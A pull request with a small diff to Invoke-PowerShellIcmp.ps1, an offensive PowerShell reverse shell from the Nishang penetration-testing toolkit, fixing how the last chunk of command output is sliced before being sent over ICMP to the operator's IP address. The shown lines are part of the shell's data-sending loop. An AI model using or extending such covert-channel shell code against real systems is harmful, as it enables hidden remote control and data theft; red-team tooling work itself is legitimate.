### PR TITLE
Fix wrong message in ICMP shell

### DIFF
--- a/Shells/Invoke-PowerShellIcmp.ps1
+++ b/Shells/Invoke-PowerShellIcmp.ps1
@@ -87,10 +87,10 @@ https://github.com/samratashok/nishang
                     $ICMPClient.Send($IPAddress,60 * 10000, $sendbytes2, $PingOptions) | Out-Null
                     $i +=1
                 }
-                $remainingindex = $sendbytes.Length%$BufferSize
+                $remainingindex = $sendbytes.Length % $BufferSize
                 if ($remainingindex -ne 0)
                 {
-                    $sendbytes2 = $sendbytes[($i*$BufferSize)..($remainingindex)]
+                    $sendbytes2 = $sendbytes[($i*$BufferSize)..($sendbytes.Length)]
                     $ICMPClient.Send($IPAddress,60 * 10000, $sendbytes2, $PingOptions) | Out-Null
                 }
             }


### PR DESCRIPTION
The last packet should reach the end of buffer, but now it looks like a palindrome.